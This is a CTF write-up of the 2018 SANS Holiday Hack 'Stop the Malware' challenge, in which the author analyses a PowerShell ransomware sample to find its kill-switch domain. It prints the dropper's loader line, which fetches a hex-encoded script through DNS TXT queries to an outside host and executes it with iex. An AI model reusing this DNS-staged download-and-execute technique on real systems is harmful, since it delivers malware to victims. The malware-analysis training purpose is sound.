Salaheldin

March 14, 2019

Stop the Malware

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup

📍 Cookie Recipe document to find killswitch domain, then HoHoHo daddy terminal to register the domain : the terminal is beside the snort terminal.

kc18_elves_elf_21.png

Unfortunately, Snort alerts show multiple domains, so blocking that one won’t be effective.

I remember another ransomware in recent history had a killswitch domain that, when registered, would prevent any further infections.

Perhaps there is a mechanism like that in this ransomware? Do some more analysis and see if you can find a fatal flaw and activate it!

icon-idea

Ransomware Kill Switches:

I think I remember reading an article recently about Ransomware Kill Switchs. Wouldn’t it be nice if our ransomware had one!

https://www.wired.com/2017/05/accidental-kill-switch-slowed-fridays-massive-ransomware-attack/


solution-icon.png

01- Let’s continue analysis of our malware file :

First edit source-1.ps1 and remove iex to prevent running PowerShell file wannacookie.min.ps1 after download:

The code after editing :

function H2A($a) {$o; $a -split ‘(..)’ | ? { $_ } | forEach {[char]([convert]::toint16($_,16))} | forEach {$o = $o + $_}; return $o}; $f = “77616E6E61636F6F6B69652E6D696E2E707331”; $h = “”; foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server erohetfanu.com -Name “$f.erohetfanu.com” -Type TXT).strings, 10)-1)) {$h += (Resolve-DnsName -Server erohetfanu.com -Name “$i.$f.erohetfanu.com” -Type TXT).strings}; iex($(H2A $h | Out-string))


02- Let’s run the modified code and export the result to wannacookie.min.ps1 by adding | out-file wannacookie.min.ps1 at the end of our command :

.\source-1.ps1 | out-file wannacookie.min.ps1

It will take some time wait until finish.


03- Let’s look at wannacookie.min.ps1 :

type .\wannacookie.min.ps1

20-img-3.jpg

It’s hard to view here Let’s look at it in Visual Basic Code , open the file in Visual Basic Code and clean it up to get a better view , the file after clean up will look like this:

20-img-4.jpg


04- Let’s read the code after we cleaned it:

  • AES Encryption function e_d_file
  • Conversion functions H2B , A2H , H2A , B2H, ti_rox
  • Compression function B2G
  • Decompress function G2B
  • Hashing function sh1
  • Encrypt function using PublicKey p_k_e
  • Encrypt and Decrypt function e_n_d
  • Get using DNS function g_o_dns
  • Split function s_2_c
  • Send using DNS function snd_k
  • The Main function wanc


05- We are looking for kill switch domain like wanna cry malware to stop this ransomware before running , this has to be at the beginning of the main function:

A. Let’s take a look at the first code In main function :

20-img-2.jpg

This code line is making request over DNS using $S1 after applying few functions to convert it and compress it then it sent to google dns server 8.8.8.8 , if answer is not null $null -ne continue running the rest of the code , but if answer is null $null than exit the code and stop running.

Also the -ErrorAction 0 option to silently continue even if there is an error .

return means exit the current scope, which can be a function, script, or script block.

Seems this is our kill switch, So we need to figure out what is the dns query name.

B. From previous steps you will notice that malware use DNS request with subdomain in dns query name which refer to what file or message needed , here we have request using this code: 6B696C6C737769746368

C. Let’s decoded From HEX as before:

6B696C6C737769746368 > killswitch

So this confirm that the kill switch domain must be in this code block.

D. Let’s use PowerShell ISE to create separate points and view the data as been transmitted and call functions from the malware script.

E. Run PowerShell ISE and open the file wannacookie.min.ps1, then extract the name query from the script block and add it into new line after $S1 and assign it to $ks the code will be :

20-img-1.jpg

Also add stop point after $ks block script to stop the script , then run.

In bottom console write $ks to print out the domain name in dns query :

20-img-5.jpg

We found it ! yippeekiyaa.aaay

06- Go to HoHoHo daddy terminal and register the domainyippeekiyaa.aaay” to stop the malware from doing a new infections:

20-img-6.jpg

20-img-7.jpg


kc18_elves_elf_21.png

Yippee-Ki-Yay! Now, I have a ma... kill-switch!